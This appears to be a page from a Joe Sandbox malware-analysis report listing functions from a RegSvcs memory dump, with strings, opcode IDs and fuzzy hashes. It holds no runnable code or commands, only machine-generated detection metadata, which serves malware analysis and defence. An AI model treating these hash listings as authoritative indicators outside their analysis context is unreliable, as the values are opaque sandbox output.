                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MUI
                                                          • API String ID: 0-17815947
                                                          • Opcode ID: 9eea183b7b8acedef8b0f8987a21a9e0ca59935d76689103c27fe840c1a13e4f
                                                          • Instruction ID: 6d9b2df6af78acdefa62067bd9bf031ccd2deaf4c50d8eeb92150ed9f48853b5
                                                          • Opcode Fuzzy Hash: 9eea183b7b8acedef8b0f8987a21a9e0ca59935d76689103c27fe840c1a13e4f
                                                          • Instruction Fuzzy Hash: A2513871D0021DAEDF11DFA9CCA0EEFBBB8EB58754F14052AE611B76A0D6309A05CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • kLsE, xrefs: 01430540
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0143063D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 0-2547482624
                                                          • Opcode ID: 5103931f8a5320912a88dddb3591bdadc7c8343688dd94adce85acde3d76d0a6
                                                          • Instruction ID: 97632671c349d0ed20033322b744b8adfccdb13188a5254efe0b4cedec6bce8d
                                                          • Opcode Fuzzy Hash: 5103931f8a5320912a88dddb3591bdadc7c8343688dd94adce85acde3d76d0a6
                                                          • Instruction Fuzzy Hash: 8151BE715047428BD725EF29C4406A7BBE4AFC8304F104A3FFAAA873A1E770D545CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0143A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0143A309
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0143A2FB
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          • API String ID: 0-2876891731
                                                          • Opcode ID: 294864a1093a00d889a90a2b1f3430dbc75ddbd4f47091c781e6d7c6eba0d2de
                                                          • Instruction ID: 4114046d769abd5c67ce496a6fd0c97918af1aa777a94e8388193ae8d909585b
                                                          • Opcode Fuzzy Hash: 294864a1093a00d889a90a2b1f3430dbc75ddbd4f47091c781e6d7c6eba0d2de
                                                          • Instruction Fuzzy Hash: DE41AB30A40655DBEB12CF59C884BAABBF4FF98710F2440AAE944DB3B1E3B5D901CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 2994545307-4008356553
                                                          • Opcode ID: a696065512427c0d1f7356f82b7240056905b9dfcb0664608d64bc8de4e330da
                                                          • Instruction ID: 7dd16ea41e4deb05ddd1fe342d6c7bdb15d983f8c2cf7826c8f8fd6b55413b68
                                                          • Opcode Fuzzy Hash: a696065512427c0d1f7356f82b7240056905b9dfcb0664608d64bc8de4e330da
                                                          • Instruction Fuzzy Hash: E201D1B2240B40AFD321DF14CD45F2677E8E795719F05893AE69CCB1A0E374E804CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0143C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          • Opcode ID: 77521d15389be8360ef16c90ccc1b0573ef6b3a04cd35a18b7b3f01ba588ed80
                                                          • Instruction ID: 29be99c7094067761e19b03143c3796f03a1f0369e2a2eb9ccc867b2fdf50a7f
                                                          • Opcode Fuzzy Hash: 77521d15389be8360ef16c90ccc1b0573ef6b3a04cd35a18b7b3f01ba588ed80
                                                          • Instruction Fuzzy Hash: D2825F75E002199BDB25CFA9C8807EEBBB5BF88710F14816BD959AB3A1D7309D42CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: e5fdf7f6688ffe0c4725d71bb56a1610dce79dea24ff99f33a6a852273f85cd4
                                                          • Instruction ID: e2b2519a632cc20778ab527e62620253f06cc1af195dabef0f33eb7605dc1c69
                                                          • Opcode Fuzzy Hash: e5fdf7f6688ffe0c4725d71bb56a1610dce79dea24ff99f33a6a852273f85cd4
                                                          • Instruction Fuzzy Hash: 39917372901219AFEB21DF95CC85FEE7BB8EF14B50F11406AF600AB2A1D775AD00CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014DE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 45356fdede2965851aa58156c851d870e57d67b327a5df51d1dbe0a0da8a88c3
                                                          • Instruction ID: a0cd3ffa6c1992da55f4764e8942b300cf47c60bddee8372fb949fb0b19ecd37
                                                          • Opcode Fuzzy Hash: 45356fdede2965851aa58156c851d870e57d67b327a5df51d1dbe0a0da8a88c3
                                                          • Instruction Fuzzy Hash: 60919F72A00609ABDF22AFA6DC54FAFBB79EF55740F10001AF501AB270DB749902CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          • Opcode ID: 737bea8e1bb06fad8a3dbf8c69bbbfd4791270de003961d4146ff2b90e6d03c2
                                                          • Instruction ID: f61cd747addf7189e3f3004e0147f966081d157f8e34a31db3db7e4340c453a8
                                                          • Opcode Fuzzy Hash: 737bea8e1bb06fad8a3dbf8c69bbbfd4791270de003961d4146ff2b90e6d03c2
                                                          • Instruction Fuzzy Hash: 187162B5E0120A8FDF24DF9DC5906AEBBB5BF68710F5A812FE505A7361E7308841CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .mui
                                                          • API String ID: 0-1199573805
                                                          • Opcode ID: ff25d33050935b02f29c497d18c21dc6cb3e9609a538ab07b38130112c7d6ff2
                                                          • Instruction ID: 7088d1df29cb8c2ac2beb5197ebd122ce190affd09eb07edaff97e7a835f0929
                                                          • Opcode Fuzzy Hash: ff25d33050935b02f29c497d18c21dc6cb3e9609a538ab07b38130112c7d6ff2
                                                          • Instruction Fuzzy Hash: F351A572D0022A9BDF11DF99D854AAEBBB4AF18610F09412FE911BB760D7349901CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0144E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          • Opcode ID: 15834c915645699cb23b11b55b501b2bcb091b49794f437d85fc776faaa720b6
                                                          • Instruction ID: 67a3c2810c3c323a3d29a19056be2e689980cc0c2592de95f972caa5cc418ff5
                                                          • Opcode Fuzzy Hash: 15834c915645699cb23b11b55b501b2bcb091b49794f437d85fc776faaa720b6
                                                          • Instruction Fuzzy Hash: 1841A3725043129BF711DB76C880B6BB7D8BF98714F440D2FF684E7260E678D9048796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: 2e672a259f43e21174cc5b0bd084e20974b0bfa72adc1c08082eeba10593ce78
                                                          • Instruction ID: 2bc4799a5604888f499d5a41589c03b24844ca20331a94a42bf5f6562c868e87
                                                          • Opcode Fuzzy Hash: 2e672a259f43e21174cc5b0bd084e20974b0bfa72adc1c08082eeba10593ce78
                                                          • Instruction Fuzzy Hash: 5E4175F1D0012DABDB61DB51CC80FDEB77CAB64714F4145AAE608AB150DB709E488FA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 61920c7fd0e95540ed164b0b546911f1465307d764589dea102eff0ed530e542
                                                          • Instruction ID: 328005ebc0d74448f4dc112709fe9e0feee426846172460f343651e0dcaec2c2
                                                          • Opcode Fuzzy Hash: 61920c7fd0e95540ed164b0b546911f1465307d764589dea102eff0ed530e542
                                                          • Instruction Fuzzy Hash: 4A312735A002199BEB32CF69C840BFE7BA8DF15B04F16802EE951AB3A2D775D805CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014ACA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          • Opcode ID: 939c924cc451892d867015768ca6dfdade20ff28a8b10e196f13338e27caa962
                                                          • Instruction ID: 54df8cca41e9553ae1af356211d7fb3fb2e8d3c254df54436cd8de5014d53a3f
                                                          • Opcode Fuzzy Hash: 939c924cc451892d867015768ca6dfdade20ff28a8b10e196f13338e27caa962
                                                          • Instruction Fuzzy Hash: 68312536900519AFEB15DB59D891EBFBB74EFA0720F42412AE911AB260D7319E00DBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 014B895E
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          • Opcode ID: dad373710553f3a3eb662bd637c82762b51c94797ea95135c3971c8cad98e4ba
                                                          • Instruction ID: 81df419e030b541c6693ff796df9c6170ec32c51733883977dfd7300a562ccec
                                                          • Opcode Fuzzy Hash: dad373710553f3a3eb662bd637c82762b51c94797ea95135c3971c8cad98e4ba
                                                          • Instruction Fuzzy Hash: E301F7322102229BEB355F56C8C4AE77B69EFA7654F04042FF6411A2B1CB30A846D7B6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D2000 Relevance: .8, Instructions: 757COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd46431f265c02d39ff0ba15753538e763ba6eaa615ea19917660a4135c6818d
                                                          • Instruction ID: f5692d9cb484d18c544cd725e599e21bbdec9f8d5622f3121ae2b07d99912909
                                                          • Opcode Fuzzy Hash: fd46431f265c02d39ff0ba15753538e763ba6eaa615ea19917660a4135c6818d
                                                          • Instruction Fuzzy Hash: 0742B3316083419BDB25CF69C8A1E6BBBE5AF94300F48492FFA8697370D7B1D845CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C8158 Relevance: .6, Instructions: 617COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83881ea3d8430ee09b7b31dd33f0661028a92ea72450cf39154dd41664efc2e3
                                                          • Instruction ID: 9cdadbf94b4c770b308aad29b4d731a0e9aa9aa4815ef70176ecb9455477ccec
                                                          • Opcode Fuzzy Hash: 83881ea3d8430ee09b7b31dd33f0661028a92ea72450cf39154dd41664efc2e3
                                                          • Instruction Fuzzy Hash: 1D426E75A0021A9FEB64CF69C841BAEBBF5BF58700F14809EE949EB352D7349981CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01442840 Relevance: .6, Instructions: 605COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e0d44f921a774e50fa1c92df58e27587c0fc5bbb1ce1b49a5c0f9b6864370a2
                                                          • Instruction ID: f25c90474482059d5c0cced0d84043d4e88c549df155985dd6731b0beb1c6a6f
                                                          • Opcode Fuzzy Hash: 4e0d44f921a774e50fa1c92df58e27587c0fc5bbb1ce1b49a5c0f9b6864370a2
                                                          • Instruction Fuzzy Hash: AC32CD70A007558BEF25CF69C844BBEBFF2AF84304F15411EE54A9B3A5D775A842CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014DA118 Relevance: .6, Instructions: 591COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f53ba2ca57be0045d757b8e67923cab7621fdce0bdfb70e7e496b8b99d71b244
                                                          • Instruction ID: 835a4266fb2b828ee4bbae0aeca3f33e65894416f52b3650b11345da51971f0b
                                                          • Opcode Fuzzy Hash: f53ba2ca57be0045d757b8e67923cab7621fdce0bdfb70e7e496b8b99d71b244
                                                          • Instruction Fuzzy Hash: E822CE702046618BEF25CF2DC0A4376BBF1AF45304F28845BE9968F3A6D775E452CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01436A50 Relevance: .5, Instructions: 548COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c5f1b61c65c3525fa4049b9e28f3a7b624f3af54fba3b3cd87f8ac62c014afa
                                                          • Instruction ID: 7517b89e9d132dfae476ab3a395ce4f2f006a18b027dac350a5ab204b0b178e6
                                                          • Opcode Fuzzy Hash: 6c5f1b61c65c3525fa4049b9e28f3a7b624f3af54fba3b3cd87f8ac62c014afa
                                                          • Instruction Fuzzy Hash: 4D32AE71A00216DFDB25CFA9C480BAABBF1FF8C310F15456AE955AB3A1D730E942CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01454A35 Relevance: .4, Instructions: 423COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction ID: 4b821bf5720ce1059a3c20b65570cf200dd3f7c9a305f646175e552931fbf0b8
                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction Fuzzy Hash: 45F16E71E0021A9BDF55CF99D580BAEBBF5AF48710F09812AED05AF361E774D882CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C892B Relevance: .4, Instructions: 386COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a9b1d00db10a588d19e47fb095d27335c92daaeeee34112ff08d4bd9fa3a7257
                                                          • Instruction ID: ca639eba272f7aa90a286d4055cd5c408d1b4b40337ba920dfec314d4502c7ba
                                                          • Opcode Fuzzy Hash: a9b1d00db10a588d19e47fb095d27335c92daaeeee34112ff08d4bd9fa3a7257
                                                          • Instruction Fuzzy Hash: 71D11179A0060B9BDF55CF69C840AFFB7F1AF88B04F18816ED855A7251E735E902CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014365D0 Relevance: .4, Instructions: 383COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4c55be00636dc545337b069f5f033512b1f26688e355ceb85b1480048c8e2069
                                                          • Instruction ID: 4dba55bb542e9ac396554df4414286f17f49170d77646fc9cec8221cf431eb02
                                                          • Opcode Fuzzy Hash: 4c55be00636dc545337b069f5f033512b1f26688e355ceb85b1480048c8e2069
                                                          • Instruction Fuzzy Hash: 4BE16A715083429FC715CF28C490A6BBBE1BFC9314F46896EE99987361DB31EA05CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01428397 Relevance: .4, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3bbdf2054ef739a78a54747f96b2a83970522845e72eac3284ce970619ed295d
                                                          • Instruction ID: 80598aa682bc5116c80b80c025c360f15f643bdde6178ff191d8642f373e9756
                                                          • Opcode Fuzzy Hash: 3bbdf2054ef739a78a54747f96b2a83970522845e72eac3284ce970619ed295d
                                                          • Instruction Fuzzy Hash: 83D1C171A002279FDB14DF69C890ABE77E5FF64208F44422FE916DB2A1E734D991CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B8243 Relevance: .3, Instructions: 322COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction ID: 8d2f933f12b5e7f52fbd0c6d2f0a14c92176cfeee567e6640a2f36e37a34c460
                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction Fuzzy Hash: 0DB14474A006069FDF28DF59C980AEBBBBDFF54304F14446FAA41977A0DA34E905DB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01440535 Relevance: .3, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction ID: f02ef4cd4fe73fc8338677b0d51449a626fe2b867eab899459af5bea1725ae6e
                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction Fuzzy Hash: 50B1F5716006469FEF25DB69C950BBFBBF6EF44200F18015BE6569B3A1D730E942CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014383C0 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ef86d03918af4772fd987a73b54402d5bcbd0e95ce6829b8e7e0b100e9ddb27
                                                          • Instruction ID: 94074042fcf76984ada3950d96092f307990a8800fdb60fe1de3343210806a8c
                                                          • Opcode Fuzzy Hash: 4ef86d03918af4772fd987a73b54402d5bcbd0e95ce6829b8e7e0b100e9ddb27
                                                          • Instruction Fuzzy Hash: 05C15B701083828FDB64CF19C484BABBBE5BF98704F44496EE989873A1D774E905CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142C427 Relevance: .3, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 169cd5cb9ac3dc672718610d8fff144187f024733b0a7d7431a6f72aaaa7587f
                                                          • Instruction ID: 30f05a4025f857f4f27461c8d03b11ae24a8271f58869ccfcc58a98b78ce492b
                                                          • Opcode Fuzzy Hash: 169cd5cb9ac3dc672718610d8fff144187f024733b0a7d7431a6f72aaaa7587f
                                                          • Instruction Fuzzy Hash: 22B15F70A002668ADB64DF59C890BAEB3B1AF54700F5485EBD50AE7361EB70DDC6CB21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145E5E7 Relevance: .3, Instructions: 278COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22805dc0c7c5da365a22f2c8e9e050a2f3a6c0fed3039d02aabc7858acaf3935
                                                          • Instruction ID: 32c0b9390e6353013e7f9c2f8b6e23b795d1f86f8419f6555dc8fcba166fcabb
                                                          • Opcode Fuzzy Hash: 22805dc0c7c5da365a22f2c8e9e050a2f3a6c0fed3039d02aabc7858acaf3935
                                                          • Instruction Fuzzy Hash: CEA10F31E00655ABEB21CF98C844BAEBFA4BB01750F050127EE50BB3B2D7749E45CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01470185 Relevance: .3, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62418c62f7559e6dfea56ffcc61cb961d94780b31623968b546a6411a29d86f5
                                                          • Instruction ID: 065ed4a5b431a724e62a89788d69cc2740c443af125f4418531a84eacb42a150
                                                          • Opcode Fuzzy Hash: 62418c62f7559e6dfea56ffcc61cb961d94780b31623968b546a6411a29d86f5
                                                          • Instruction Fuzzy Hash: D0A1C071A026169BDB25CF69C590BAAB7A1FF65318F10402AEA05973A1DB34E816CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01504500 Relevance: .3, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
